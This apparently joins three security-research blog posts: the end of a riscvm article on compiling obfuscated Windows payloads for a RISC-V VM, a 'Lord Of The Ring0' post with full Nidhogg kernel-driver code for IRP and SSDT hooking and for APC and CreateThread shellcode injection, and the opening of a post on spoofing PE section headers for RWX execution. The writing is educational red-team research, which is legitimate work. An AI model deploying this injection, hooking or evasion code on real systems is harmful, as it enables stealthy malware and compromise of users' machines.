  %arg3_cast = inttoptr i64 %arg3_zext to ptr
  %import_address = load ptr, ptr @import_MessageBoxA, align 8
  %arg0_ptr = getelementptr ptr, ptr %args, i32 0
  store ptr %0, ptr %arg0_ptr, align 8
  %arg1_ptr = getelementptr ptr, ptr %args, i32 1
  store ptr %1, ptr %arg1_ptr, align 8
  %arg2_ptr = getelementptr ptr, ptr %args, i32 2
  store ptr %2, ptr %arg2_ptr, align 8
  %arg3_ptr = getelementptr ptr, ptr %args, i32 3
  store ptr %arg3_cast, ptr %arg3_ptr, align 8
  %return = call ptr @riscvm_host_call(ptr %import_address, ptr %args)
  %return_cast = ptrtoint ptr %return to i64
  %return_trunc = trunc i64 %return_cast to i32
  ret i32 %return_trunc
}

The uint64_t args[13] array is allocated on the stack using the alloca instruction and every function argument is stored in there (after being zero-extended). The GlobalVariable named import_MessageBoxA is read and finally riscvm_host_call is executed to call the import on the host side. The return value is truncated as appropriate and returned from the stub.

The LLVM IR for the generated riscvm_imports function looks like this:

; Global string for LoadLibraryA
@str_USER32.dll = private constant [11 x i8] c"USER32.dll\00"

define void @riscvm_imports() {
entry:
  %args = alloca ptr, i32 13, align 8
  %kernel32.dll_base = call ptr @riscvm_resolve_dll(i32 1399641682)
  %import_LoadLibraryA = call ptr @riscvm_resolve_import(ptr %kernel32.dll_base, i32 -550781972)
  %arg0_ptr = getelementptr ptr, ptr %args, i32 0
  store ptr @str_USER32.dll, ptr %arg0_ptr, align 8
  %USER32.dll_base = call ptr @riscvm_host_call(ptr %import_LoadLibraryA, ptr %args)
  %import_MessageBoxA = call ptr @riscvm_resolve_import(ptr %USER32.dll_base, i32 -50902915)
  store ptr %import_MessageBoxA, ptr @import_MessageBoxA, align 8
  ret void
}

The resolving itself uses the riscvm_resolve_dll and riscvm_resolve_import functions we discussed in a previous section. The final detail is that user32.dll is not loaded into every process, so we need to manually call LoadLibraryA to resolve it.

Instead of resolving the DLL and import hashes at runtime, they are resolved by the transpiler at compile-time, which makes things a bit more annoying to analyze for an attacker.

Trade-offs

While the retargeting approach works well for simple C++ code that makes use of the Windows API, it currently does not work properly when the C/C++ standard library is used. Getting this to work properly will be difficult, but things like std::vector can be made to work with some tricks. The limitations are conceptually quite similar to driver development and we believe this is a big improvement over manually recreating types and manual wrappers with riscvm_host_call.

An unexplored potential area for bugs is the unverified change to the DataLayout of the LLVM module. In our tests, we did not observe any differences in structure layouts between rv64 and x64 code, but most likely there are some nasty edge cases that would need to be properly handled.

If the code written is mainly cross-platform, portable C++ with heavy use of the STL, an alternative design could be to compile most of it with a regular C++ cross-compiler and use the retargeting only for small Windows-specific parts.

One of the biggest advantages of retargeting a (mostly) regular Windows C++ program is that the payload can be fully developed and tested on Windows itself. Debugging is much more difficult once the code becomes RISC-V and our approach fully decouples the development of the payload from the VM itself.

CRT0

The final missing piece of the crt0 component is the _start function that glues everything together:

static void exit(int exit_code);
static void riscvm_relocs();
void        riscvm_imports() __attribute__((weak));
static void riscvm_init_arrays();
extern int __attribute((noinline)) main();

// NOTE: This function has to be first in the file
void _start()
{
    riscvm_relocs();
    riscvm_imports();
    riscvm_init_arrays();
    exit(main());
    asm volatile("ebreak");
}

void riscvm_imports()
{
    // Left empty on purpose
}

The riscvm_imports function is defined as a weak symbol. This means the implementation provided in crt0.c can be overwritten by linking to a stronger symbol with the same name. If we generate a riscvm_imports function in our retargeted bitcode, that implementation will be used and we can be certain we execute before main!

Example payload project

Now that all the necessary tooling has been described, we can put everything together in a real project! In the repository, this is all done in the payload folder. To make things easy, this is a simple cmkr project with a template to enable the retargeting scripts:

# Reference: https://build-cpp.github.io/cmkr/cmake-toml
[cmake]
version = "3.19"
cmkr-include = "cmake/cmkr.cmake"

[project]
name = "payload"
languages = ["CXX"]
cmake-before = "set(CMAKE_CONFIGURATION_TYPES Debug Release)"
include-after = ["cmake/riscvm.cmake"]
msvc-runtime = "static"

[fetch-content.phnt]
url = "https://github.com/mrexodia/phnt-single-header/releases/download/v1.2-4d1b102f/phnt.zip"

[template.riscvm]
type = "executable"
add-function = "add_riscvm_executable"

[target.payload]
type = "riscvm"
sources = [
    "src/main.cpp",
    "crt/minicrt.c",
    "crt/minicrt.cpp",
]
include-directories = [
    "include",
]
link-libraries = [
    "riscvm-crt0",
    "phnt::phnt",
]
compile-features = ["cxx_std_17"]
msvc.link-options = [
    "/INCREMENTAL:NO",
    "/DEBUG",
]

In this case, the add_executable function has been replaced with an equivalent add_riscvm_executable that creates an additional payload.bin file that can be consumed by the riscvm interpreter. The only thing we have to make sure of is to enable clang-cl when configuring the project:

cmake -B build -T ClangCL

After this, you can open build\payload.sln in Visual Studio and develop there as usual. The custom cmake/riscvm.cmake script does the following:

  • Enable LTO
  • Add the -lto-embed-bitcode linker flag
  • Locale clang.exe, ld.lld.exe and llvm-objcopy.exe
  • Compile crt0.c for the riscv64 architecture
  • Create a Python virtual environment with the necessary dependencies

The add_riscvm_executable adds a custom target that processes the regular output executable and executes the retargeter and relevant Python scripts to produce the riscvm artifacts:

function(add_riscvm_executable tgt)
    add_executable(${tgt} ${ARGN})
    if(MSVC)
        target_compile_definitions(${tgt} PRIVATE _NO_CRT_STDIO_INLINE)
        target_compile_options(${tgt} PRIVATE /GS- /Zc:threadSafeInit-)
    endif()
    set(BC_BASE "$<TARGET_FILE_DIR:${tgt}>/$<TARGET_FILE_BASE_NAME:${tgt}>")
    add_custom_command(TARGET ${tgt}
        POST_BUILD
        USES_TERMINAL
        COMMENT "Extracting and transpiling bitcode..."
        COMMAND "${Python3_EXECUTABLE}" "${RISCVM_DIR}/extract-bc.py" "$<TARGET_FILE:${tgt}>" -o "${BC_BASE}.bc" --importmap "${BC_BASE}.imports"
        COMMAND "${TRANSPILER}" -input "${BC_BASE}.bc" -importmap "${BC_BASE}.imports" -output "${BC_BASE}.rv64.bc"
        COMMAND "${CLANG_EXECUTABLE}" ${RV64_FLAGS} -c "${BC_BASE}.rv64.bc" -o "${BC_BASE}.rv64.o"
        COMMAND "${LLD_EXECUTABLE}" -o "${BC_BASE}.elf" --oformat=elf -emit-relocs -T "${RISCVM_DIR}/lib/linker.ld" "--Map=${BC_BASE}.map" "${CRT0_OBJ}" "${BC_BASE}.rv64.o"
        COMMAND "${OBJCOPY_EXECUTABLE}" -O binary "${BC_BASE}.elf" "${BC_BASE}.pre.bin"
        COMMAND "${Python3_EXECUTABLE}" "${RISCVM_DIR}/relocs.py" "${BC_BASE}.elf" --binary "${BC_BASE}.pre.bin" --output "${BC_BASE}.bin"
        COMMAND "${Python3_EXECUTABLE}" "${RISCVM_DIR}/encrypt.py" --encrypt --shuffle --map "${BC_BASE}.map" --shuffle-map "${RISCVM_DIR}/shuffled_opcodes.json" --opcodes-map "${RISCVM_DIR}/opcodes.json" --output "${BC_BASE}.enc.bin" "${BC_BASE}.bin"
        VERBATIM
    )
endfunction()

While all of this is quite complex, we did our best to make it as transparent to the end-user as possible. After enabling Visual Studio’s LLVM support in the installer, you can start developing VM payloads in a few minutes. You can get a precompiled transpiler binary from the releases.

Debugging in riscvm

When debugging the payload, it is easiest to load payload.elf in Ghidra to see the instructions. Additionally, the debug builds of the riscvm executable have a --trace flag to enable instruction tracing. The execution of main in the MessageBoxA example looks something like this (labels added manually for clarity):

                      main:
0x000000014000d3a4:   addi     sp, sp, -0x10 = 0x14002cfd0
0x000000014000d3a8:   sd       ra, 0x8(sp) = 0x14000d018
0x000000014000d3ac:   auipc    a0, 0x0 = 0x14000d4e4
0x000000014000d3b0:   addi     a1, a0, 0xd6 = 0x14000d482
0x000000014000d3b4:   auipc    a0, 0x0 = 0x14000d3ac
0x000000014000d3b8:   addi     a2, a0, 0xc7 = 0x14000d47b
0x000000014000d3bc:   addi     a0, zero, 0x0 = 0x0
0x000000014000d3c0:   addi     a3, zero, 0x0 = 0x0
0x000000014000d3c4:   jal      ra, 0x14 -> 0x14000d3d8
                        MessageBoxA:
0x000000014000d3d8:     addi     sp, sp, -0x70 = 0x14002cf60
0x000000014000d3dc:     sd       ra, 0x68(sp) = 0x14000d3c8
0x000000014000d3e0:     slli     a3, a3, 0x0 = 0x0
0x000000014000d3e4:     srli     a4, a3, 0x0 = 0x0
0x000000014000d3e8:     auipc    a3, 0x0 = 0x0
0x000000014000d3ec:     ld       a3, 0x108(a3=>0x14000d4f0) = 0x7ffb3c23a000
0x000000014000d3f0:     sd       a0, 0x0(sp) = 0x0
0x000000014000d3f4:     sd       a1, 0x8(sp) = 0x14000d482
0x000000014000d3f8:     sd       a2, 0x10(sp) = 0x14000d47b
0x000000014000d3fc:     sd       a4, 0x18(sp) = 0x0
0x000000014000d400:     addi     a1, sp, 0x0 = 0x14002cf60
0x000000014000d404:     addi     a0, a3, 0x0 = 0x7ffb3c23a000
0x000000014000d408:     jal      ra, -0x3cc -> 0x14000d03c
                          riscvm_host_call:
0x000000014000d03c:       lui      a2, 0x5 = 0x14000d47b
0x000000014000d040:       addiw    a7, a2, -0x1e0 = 0x4e20
0x000000014000d044:       ecall    0x4e20
0x000000014000d048:       ret      (0x14000d40c)
0x000000014000d40c:     ld       ra, 0x68(sp=>0x14002cfc8) = 0x14000d3c8
0x000000014000d410:     addi     sp, sp, 0x70 = 0x14002cfd0
0x000000014000d414:     ret      (0x14000d3c8)
0x000000014000d3c8:   addi     a0, zero, 0x0 = 0x0
0x000000014000d3cc:   ld       ra, 0x8(sp=>0x14002cfd8) = 0x14000d018
0x000000014000d3d0:   addi     sp, sp, 0x10 = 0x14002cfe0
0x000000014000d3d4:   ret      (0x14000d018)
0x000000014000d018: jal      ra, 0x14 -> 0x14000d02c
                      exit:
0x000000014000d02c:   lui      a1, 0x2 = 0x14002cf60
0x000000014000d030:   addiw    a7, a1, 0x710 = 0x2710
0x000000014000d034:   ecall    0x2710

The tracing also uses the enums for the opcodes, so it works with shuffled and encrypted payloads as well.

Outro

Hopefully this article has been an interesting read for you. We tried to walk you through the process in the same order we developed it in, but you can always refer to the riscy-business GitHub repository and try things out for yourself if you got confused along the way. If you have any ideas for improvements, or would like to discuss, you are always welcome in our Discord server!

We would like to thank the following people for proofreading and discussing the design and implementation with us (alphabetical order):

Additionally, we highly appreciate the open source projects that we built this project on! If you use this project, consider giving back your improvements to the community as well.

Merry Christmas!

Lord Of The Ring0 - Part 5 | Saruman’s Manipulation

19 July 2023 at 00:00

star fork follow

Prologue

In the last blog post, we learned about the different types of kernel callbacks and created our registry protector driver.

In this blog post, I’ll explain two common hooking methods (IRP Hooking and SSDT Hooking) and two different injection techniques from the kernel to the user mode for both shellcode and DLL (APC and CreateThread) with code snippets and examples from Nidhogg.

IRP Hooking

Side note: This topic (and more) was also covered in my talk “(Lady)Lord Of The Ring0” - feel free to check that out!

IRP Reminder

This is a quick reminder from the 2nd part, if you remember what IRP is you can skip to the next section.

“An I/O request packet (IRP) is the basic I/O manager structure used to communicate with drivers and to allow drivers to communicate with each other. A packet consists of two different parts:

  • Header, or fixed part of the packet — This is used by the I/O manager to store information about the original request.
  • I/O stack locations — Stack location contains the parameters, function codes, and context used by the corresponding driver to determine what it is supposed to be doing.” - Microsoft Docs.

In simple words, IRP allows kernel developers to communicate either from user mode to kernel mode or from one kernel driver to another. Each time a certain IRP is sent, the corresponding function in the dispatch table is executed. The dispatch table (or MajorFunction) is a member inside the DRIVER_OBJECT that contains the mapping between the IRP and the function that should handle the IRP. The general signature for a function that handles IRP is:

NTSTATUS IrpHandler(PDEVICE_OBJECT DeviceObject, PIRP Irp);

To handle an IRP, the developer needs to add their function to the MajorFunction table as follows:

DriverObject->MajorFunction[IRP_CODE] = IrpHandler;

Several notable IRPs (some of them we used previously in this series) are:

  • IRP_MJ_DEVICE_CONTROL - Used to handle communication with the driver.

  • IRP_MJ_CREATE - Used to handle Zw/NtOpenFile calls to the driver.

  • IRP_MJ_CLOSE - Used to handle (among other things) Zw/NtClose calls to the driver.

  • IRP_MJ_READ - Used to handle Zw/NtReadFile calls to the driver.

  • IRP_MJ_WRITE - Used to handle Zw/NtWriteFile calls to the driver.

Implementing IRP Hooking

IRP hooking is very similar to IAT hooking in a way, as both of them are about replacing a function in a table and deciding whether to call the original function or not (usually, the original function will be called).

In IRP hooking the malicious driver replaces an IRP handler of another driver with their handler. A common example is to hook the IRP_MJ_CREATE handler of the NTFS driver to prevent file opening.

As an example, I will show the NTFS IRP_MJ_CREATE hook from Nidhogg:

NTSTATUS InstallNtfsHook(int irpMjFunction) {
    UNICODE_STRING ntfsName;
    PDRIVER_OBJECT ntfsDriverObject;
    NTSTATUS status = STATUS_SUCCESS;

    RtlInitUnicodeString(&ntfsName, L"\\FileSystem\\NTFS");
    status = ObReferenceObjectByName(&ntfsName, OBJ_CASE_INSENSITIVE, NULL, 0, *IoDriverObjectType, KernelMode, NULL, (PVOID*)&ntfsDriverObject);

    if (!NT_SUCCESS(status)) {
        KdPrint((DRIVER_PREFIX "Failed to get ntfs driver object, (0x%08X).\n", status));
        return status;
    }

    switch (irpMjFunction) {
        case IRP_MJ_CREATE: {
            // Saving the original IRP handler into a callback array.
            Callbacks[0].Address = (PVOID)InterlockedExchange64((LONG64*)&ntfsDriverObject->MajorFunction[IRP_MJ_CREATE], (LONG64)HookedNtfsIrpCreate);
            Callbacks[0].Activated = true;
            KdPrint((DRIVER_PREFIX "Switched addresses\n"));
            break;
        }
        default:
            status = STATUS_NOT_SUPPORTED;
    }

    ObDereferenceObject(ntfsDriverObject);
    return status;
}

The first thing that is needed to be done when doing an IRP hooking is to obtain the DriverObject because it stores the MajorFunction table (as mentioned before), this can be done with the ObReferenceObjectByName and the symbolic link to NTFS.

When the DriverObject is achieved, it is just a matter of overwriting the original value of IRP_MJ_CREATE with InterlockedExchange64 (NOTE: InterlockedExchange64 was used and not simply overwriting to make sure the function is not currently in used to prevent potential BSOD and other problems).

Hooking IRPs in 2023

Although this is a nice method, there is one major problem that holding kernel developers from using this method - Kernel Patch Protection (PatchGuard). As you can see here when PatchGuard detects that the IRP function is changed, it triggers a BSOD with CRITICAL_STRUCTURE_CORRUPTION error code.

While bypassing this is possible with projects like this one it is beyond the scope of this series.

SSDT Hooking

What is SSDT

SSDT (System Service Descriptor Table) is an array that contains the mapping between the syscall and the corresponding function in the kernel. The SSDT is accessible via nt!KiServiceTable in WinDBG or can be located dynamically via pattern searching.

The syscall number is the index to the relative offset of the function and is calculated as follows: functionAddress = KiServiceTable + (KiServiceTable[syscallIndex] >> 4).

Implementing SSDT Hooking

SSDT hooking is when a malicious program changes the mapping of a certain syscall to point to its function. For example, an attacker can modify the NtCreateFile address in the SSDT to point to their own malicious NtCreateFile. To do that, several steps need to be made:

  • Find the address of SSDT.
  • Find the address of the wanted function in the SSDT by its syscall.
  • Change the entry in the SSDT to point to the malicious function.

To find the address of SSDT by pattern I will use the code below (the code has been modified a bit for readability, you can view the unmodified version here):

NTSTATUS GetSSDTAddress() {
    ULONG infoSize;
    PVOID ssdtRelativeLocation = NULL;
    PVOID ntoskrnlBase = NULL;
    PRTL_PROCESS_MODULES info = NULL;
    NTSTATUS status = STATUS_SUCCESS;
    UCHAR pattern[] = "\x4c\x8d\x15\xcc\xcc\xcc\xcc\x4c\x8d\x1d\xcc\xcc\xcc\xcc\xf7";

    // Getting ntoskrnl base.
    status = ZwQuerySystemInformation(SystemModuleInformation, NULL, 0, &infoSize);

    // ...

    PRTL_PROCESS_MODULE_INFORMATION modules = info->Modules;

    for (ULONG i = 0; i < info->NumberOfModules; i++) {
        if (NtCreateFile >= modules[i].ImageBase && NtCreateFile < (PVOID)((PUCHAR)modules[i].ImageBase + modules[i].ImageSize)) {
            ntoskrnlBase = modules[i].ImageBase;
            break;
        }
    }

    // ...

    PIMAGE_DOS_HEADER dosHeader = (PIMAGE_DOS_HEADER)ntoskrnlBase;

    // Finding the SSDT address.
    status = STATUS_NOT_FOUND;
    if (dosHeader->e_magic != IMAGE_DOS_SIGNATURE)
        goto CleanUp;

    PFULL_IMAGE_NT_HEADERS ntHeaders = (PFULL_IMAGE_NT_HEADERS)((PUCHAR)ntoskrnlBase + dosHeader->e_lfanew);

    if (ntHeaders->Signature != IMAGE_NT_SIGNATURE)
        goto CleanUp;

    PIMAGE_SECTION_HEADER firstSection = (PIMAGE_SECTION_HEADER)(ntHeaders + 1);

    for (PIMAGE_SECTION_HEADER section = firstSection; section < firstSection + ntHeaders->FileHeader.NumberOfSections; section++) {
        if (strcmp((const char*)section->Name, ".text") == 0) {
            ssdtRelativeLocation = FindPattern(pattern, 0xCC, sizeof(pattern) - 1, (PUCHAR)ntoskrnlBase + section->VirtualAddress, section->Misc.VirtualSize, NULL, NULL);

            if (ssdtRelativeLocation) {
                status = STATUS_SUCCESS;
                ssdt = (PSYSTEM_SERVICE_DESCRIPTOR_TABLE)((PUCHAR)ssdtRelativeLocation + *(PULONG)((PUCHAR)ssdtRelativeLocation + 3) + 7);
                break;
            }
        }
    }

CleanUp:
    if (info)
        ExFreePoolWithTag(info, DRIVER_TAG);
    return status;
}

The code above is finding ntoskrnl base based on the location of NtCreateFile. After the base of ntoskrnl was achieved all is left to do is to find the pattern within the .text section of it. The pattern gives the relative location of the SSDT and with a simple calculation based on the relative offset the location of the SSDT is achieved.

To find a function, all there needs to be done is to find the syscall of the desired function (alternatively a hardcoded syscall can be used as well but it is bad practice for forward compatibility) and then access the right location in the SSDT (as mentioned here).

PVOID GetSSDTFunctionAddress(CHAR* functionName) {
    KAPC_STATE state;
    PEPROCESS CsrssProcess = NULL;
    PVOID functionAddress = NULL;
    PSYSTEM_PROCESS_INFO originalInfo = NULL;
    PSYSTEM_PROCESS_INFO info = NULL;
    ULONG infoSize = 0;
    ULONG index = 0;
    UCHAR syscall = 0;
    HANDLE csrssPid = 0;
    NTSTATUS status = ZwQuerySystemInformation(SystemProcessInformation, NULL, 0, &infoSize);

    // ...

    // Iterating the processes information until our pid is found.
    while (info->NextEntryOffset) {
        if (info->ImageName.Buffer && info->ImageName.Length > 0) {
            if (_wcsicmp(info->ImageName.Buffer, L"csrss.exe") == 0) {
                csrssPid = info->UniqueProcessId;
                break;
            }
        }
        info = (PSYSTEM_PROCESS_INFO)((PUCHAR)info + info->NextEntryOffset);
    }

    if (csrssPid == 0)
        goto CleanUp;
    status = PsLookupProcessByProcessId(csrssPid, &CsrssProcess);

    if (!NT_SUCCESS(status))
        goto CleanUp;

    // Attaching to the process's stack to be able to walk the PEB.
    KeStackAttachProcess(CsrssProcess, &state);
    PVOID ntdllBase = GetModuleBase(CsrssProcess, L"C:\\Windows\\System32\\ntdll.dll");

    if (!ntdllBase) {
        KeUnstackDetachProcess(&state);
        goto CleanUp;
    }
    PVOID ntdllFunctionAddress = GetFunctionAddress(ntdllBase, functionName);

    if (!ntdllFunctionAddress) {
        KeUnstackDetachProcess(&state);
        goto CleanUp;
    }

    // Searching for the syscall.
    while (((PUCHAR)ntdllFunctionAddress)[index] != RETURN_OPCODE) {
        if (((PUCHAR)ntdllFunctionAddress)[index] == MOV_EAX_OPCODE) {
            syscall = ((PUCHAR)ntdllFunctionAddress)[index + 1];
        }
        index++;
    }
    KeUnstackDetachProcess(&state);

    if (syscall != 0)
        functionAddress = (PUCHAR)ssdt->ServiceTableBase + (((PLONG)ssdt->ServiceTableBase)[syscall] >> 4);

CleanUp:
    if (CsrssProcess)
        ObDereferenceObject(CsrssProcess);

    if (originalInfo) {
        ExFreePoolWithTag(originalInfo, DRIVER_TAG);
        originalInfo = NULL;
    }

    return functionAddress;
}

The code above is finding csrss (a process that will always run and has ntdll) loaded and finding the location of the function inside ntdll. After it finds the location of the function inside ntdll, it searches for the last mov eax, [variable] pattern to make sure it finds the syscall number. When the syscall number is known, all there is needs to be done is to find the function address with the SSDT.

Hooking The SSDT in 2023

This method was abused heavily by rootkit developers and Antimalware developers alike in the golden area of rootkits. The reason this method is no longer used is because PatchGuard monitors SSDT changes and crashes the machine if a modification is detected.

While this method cannot be used in modern systems without tampering with PatchGuard, throughout the years developers found other ways to hook syscalls as substitution.

APC Injection

Explaining how APCs work is beyond the scope of this series, which is why I recommend reading Repnz’s series about APCs.

To inject a shellcode into a user mode process with an APC several conditions need to be met:

  • The thread should be alertable.
  • The shellcode should be accessible from the user mode.
NTSTATUS InjectShellcodeAPC(ShellcodeInformation* ShellcodeInfo) {
    OBJECT_ATTRIBUTES objAttr{};
    CLIENT_ID cid{};
    HANDLE hProcess = NULL;
    PEPROCESS TargetProcess = NULL;
    PETHREAD TargetThread = NULL;
    PKAPC ShellcodeApc = NULL;
    PKAPC PrepareApc = NULL;
    PVOID shellcodeAddress = NULL;
    NTSTATUS status = STATUS_SUCCESS;
    SIZE_T shellcodeSize = ShellcodeInfo->ShellcodeSize;

    HANDLE pid = UlongToHandle(ShellcodeInfo->Pid);
    status = PsLookupProcessByProcessId(pid, &TargetProcess);

    if (!NT_SUCCESS(status))
        goto CleanUp;

    // Find APC suitable thread.
    status = FindAlertableThread(pid, &TargetThread);

    if (!NT_SUCCESS(status) || !TargetThread) {
        if (NT_SUCCESS(status))
            status = STATUS_NOT_FOUND;
        goto CleanUp;
    }

    // Allocate and write the shellcode.
    InitializeObjectAttributes(&objAttr, NULL, OBJ_KERNEL_HANDLE, NULL, NULL);
    cid.UniqueProcess = pid;
    cid.UniqueThread = NULL;

    status = ZwOpenProcess(&hProcess, PROCESS_ALL_ACCESS, &objAttr, &cid);

    if (!NT_SUCCESS(status))
        goto CleanUp;

    status = ZwAllocateVirtualMemory(hProcess, &shellcodeAddress, 0, &shellcodeSize, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READ);

    if (!NT_SUCCESS(status))
        goto CleanUp;
    shellcodeSize = ShellcodeInfo->ShellcodeSize;

    status = KeWriteProcessMemory(ShellcodeInfo->Shellcode, TargetProcess, shellcodeAddress, shellcodeSize, UserMode);

    if (!NT_SUCCESS(status))
        goto CleanUp;

    // Create and execute the APCs.
    ShellcodeApc = (PKAPC)ExAllocatePoolWithTag(NonPagedPool, sizeof(KAPC), DRIVER_TAG);
    PrepareApc = (PKAPC)ExAllocatePoolWithTag(NonPagedPool, sizeof(KAPC), DRIVER_TAG);

    if (!ShellcodeApc || !PrepareApc) {
        status = STATUS_UNSUCCESSFUL;
        goto CleanUp;
    }

    // VOID PrepareApcCallback(PKAPC Apc, PKNORMAL_ROUTINE* NormalRoutine, PVOID* NormalContext, PVOID* SystemArgument1, PVOID* SystemArgument2) {
    // UNREFERENCED_PARAMETER(NormalRoutine);
    // UNREFERENCED_PARAMETER(NormalContext);
    // UNREFERENCED_PARAMETER(SystemArgument1);
    // UNREFERENCED_PARAMETER(SystemArgument2);

    // KeTestAlertThread(UserMode);
    // ExFreePoolWithTag(Apc, DRIVER_TAG);
    // }
    KeInitializeApc(PrepareApc, TargetThread, OriginalApcEnvironment, (PKKERNEL_ROUTINE)PrepareApcCallback, NULL, NULL, KernelMode, NULL);

    // VOID ApcInjectionCallback(PKAPC Apc, PKNORMAL_ROUTINE* NormalRoutine, PVOID* NormalContext, PVOID* SystemArgument1, PVOID* SystemArgument2) {
    // UNREFERENCED_PARAMETER(SystemArgument1);
    // UNREFERENCED_PARAMETER(SystemArgument2);
    // UNREFERENCED_PARAMETER(NormalContext);

    // if (PsIsThreadTerminating(PsGetCurrentThread()))
    //     *NormalRoutine = NULL;

    // ExFreePoolWithTag(Apc, DRIVER_TAG);
    // }
    KeInitializeApc(ShellcodeApc, TargetThread, OriginalApcEnvironment, (PKKERNEL_ROUTINE)ApcInjectionCallback, NULL, (PKNORMAL_ROUTINE)shellcodeAddress, UserMode, ShellcodeInfo->Parameter1);

    if (!KeInsertQueueApc(ShellcodeApc, ShellcodeInfo->Parameter2, ShellcodeInfo->Parameter3, FALSE)) {
        status = STATUS_UNSUCCESSFUL;
        goto CleanUp;
    }

    if (!KeInsertQueueApc(PrepareApc, NULL, NULL, FALSE)) {
        status = STATUS_UNSUCCESSFUL;
        goto CleanUp;
    }

    if (PsIsThreadTerminating(TargetThread))
        status = STATUS_THREAD_IS_TERMINATING;

CleanUp:
    if (!NT_SUCCESS(status)) {
        if (shellcodeAddress)
            ZwFreeVirtualMemory(hProcess, &shellcodeAddress, &shellcodeSize, MEM_DECOMMIT);
        if (PrepareApc)
            ExFreePoolWithTag(PrepareApc, DRIVER_TAG);
        if (ShellcodeApc)
            ExFreePoolWithTag(ShellcodeApc, DRIVER_TAG);
    }

    if (TargetProcess)
        ObDereferenceObject(TargetProcess);

    if (hProcess)
        ZwClose(hProcess);

    return status;
}

The code above opens a target process, search for a thread that can be alerted (can be done by examining the thread’s MiscFlags Alertable bit and the thread’s ThreadFlags’s GUI bit, if a thread is alertable and isn’t GUI related it is suitable).

If the thread is suitable, two APCs are initialized, one for alerting the thread and another one to clean up the memory and execute the shellcode.

After the APCs are initialized, they are queued - first, the APC that will clean up the memory and execute the shellcode and later the APC that is alerting the thread to execute the shellcode.

CreateThread Injection

Injecting a thread into a user mode process from the kernel is similar to injecting from a user mode with the main difference being that there are sufficient privileges to create another thread inside that process. That can be achieved easily by changing the calling thread’s previous mode to KernelMode and restoring it once the thread has been created.

NTSTATUS InjectShellcodeThread(ShellcodeInformation* ShellcodeInfo) {
    OBJECT_ATTRIBUTES objAttr{};
    CLIENT_ID cid{};
    HANDLE hProcess = NULL;
    HANDLE hTargetThread = NULL;
    PEPROCESS TargetProcess = NULL;
    PVOID remoteAddress = NULL;
    SIZE_T shellcodeSize = ShellcodeInfo->ShellcodeSize;
    HANDLE pid = UlongToHandle(ShellcodeInfo->Pid);
    NTSTATUS status = PsLookupProcessByProcessId(pid, &TargetProcess);

    if (!NT_SUCCESS(status))
        goto CleanUp;

    InitializeObjectAttributes(&objAttr, NULL, OBJ_KERNEL_HANDLE, NULL, NULL);
    cid.UniqueProcess = pid;
    cid.UniqueThread = NULL;

    status = ZwOpenProcess(&hProcess, PROCESS_ALL_ACCESS, &objAttr, &cid);

    if (!NT_SUCCESS(status))
        goto CleanUp;

    status = ZwAllocateVirtualMemory(hProcess, &remoteAddress, 0, &shellcodeSize, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READ);

    if (!NT_SUCCESS(status))
        goto CleanUp;
    shellcodeSize = ShellcodeInfo->ShellcodeSize;

    status = KeWriteProcessMemory(ShellcodeInfo->Shellcode, TargetProcess, remoteAddress, shellcodeSize, UserMode);

    if (!NT_SUCCESS(status))
        goto CleanUp;

    // Making sure that for the creation the thread has access to kernel addresses and restoring the permissions right after.
    InitializeObjectAttributes(&objAttr, NULL, OBJ_KERNEL_HANDLE, NULL, NULL);
    PCHAR previousMode = (PCHAR)((PUCHAR)PsGetCurrentThread() + THREAD_PREVIOUSMODE_OFFSET);
    CHAR tmpPreviousMode = *previousMode;
    *previousMode = KernelMode;
    status = NtCreateThreadEx(&hTargetThread, THREAD_ALL_ACCESS, &objAttr, hProcess, (PTHREAD_START_ROUTINE)remoteAddress, NULL, 0, NULL, NULL, NULL, NULL);
    *previousMode = tmpPreviousMode;

CleanUp:
    if (hTargetThread)
        ZwClose(hTargetThread);

    if (!NT_SUCCESS(status) && remoteAddress)
        ZwFreeVirtualMemory(hProcess, &remoteAddress, &shellcodeSize, MEM_DECOMMIT);

    if (hProcess)
        ZwClose(hProcess);

    if (TargetProcess)
        ObDereferenceObject(TargetProcess);

    return status;
}

Unlike the APC injection, the steps here are simple: After the process has been opened and the shellcode was allocated and written to the target process, changing the current thread’s mode to KernelMode and calling NtCreateThreadEx to create a thread inside the target process and restoring it to the original previous mode right after.

Conclusion

In this blog, we learned about the different types of kernel callbacks and created our registry protector driver.

In the next blog, we will learn how to patch user mode memory from the kernel and write a simple driver that can perform AMSI bypass to demonstrate, how to hide ports and how to dump credentials from the kernel.

I hope that you enjoyed the blog and I’m available on Twitter, Telegram and by Mail to hear what you think about it! This blog series is following my learning curve of kernel mode development and if you like this blog post you can check out Nidhogg on GitHub.

Abusing undocumented features to spoof PE section headers

5 June 2023 at 23:00

Introduction

Some time ago, I accidentally came across some interesting behaviour in PE files while debugging an unrelated project. I noticed that setting the SectionAlignment value in the NT header to a value lower than the page size (4096) resulted in significant differences in the way that the image is mapped into memory. Rather than following the usual procedure of parsing the section table to construct the image in memory, the loader appeared to map the entire file, including the headers, into memory with read-write-execute (RWX) permissions - the individual section headers were completely ignored.

As a result of this behaviour, it is possible to create a PE executable without any sections, yet still capable of executing its own code. The code can even be self-modifying if necessary due to the write permissions that are present by default.

One way in which this mode could potentially be abused would be to create a fake section table - on first inspection, this would appear to be a normal PE module containing read-write/read-only data sections, but when launched, the seemingly NX data becomes executable.

While I am sure that this technique will have already been discovered (and potentially abused) in the past, I have been unable to find any documentation online describing it. MSDN does briefly mention that the SectionAlignment value can be less than the page size, but it doesn’t elaborate any further on the implications of this.

Inside the Windows kernel

A quick look in the kernel reveals what is happening. Within MiCreateImageFileMap, we can see the parsing of PE headers - notably, if the SectionAlignment value is less than 0x1000, an undocumented flag (0x200000) is set prior to mapping the image into memory:

	if(v29->SectionAlignment < 0x1000)
	{
		if((SectionFlags & 0x80000) != 0)
 		{
			v17 = 0xC000007B;
			MiLogCreateImageFileMapFailure(v36, v39, *(unsigned int *)(v29 + 64), DWORD1(v99));
			ImageFailureReason = 55;
			goto LABEL_81;
		}
		if(!MiLegacyImageArchitecture((unsigned __int16)v99))
		{
			v17 = 0xC000007B;
			ImageFailureReason = 56;
			goto LABEL_81;
		}
		SectionFlags |= 0x200000;
	}
	v40 = MiBuildImageControlArea(a3, v38, v29, (unsigned int)&v99, SectionFlags, (__int64)&FileSize, (__int64)&v93);

If the aforementioned flag is set, MiBuildImageControlArea treats the entire file as one single section:

	if((SectionFlags & 0x200000) != 0)
	{
		SectionCount = 1;
	}
	else
	{
		SectionCount = a4->NumberOfSections + 1;
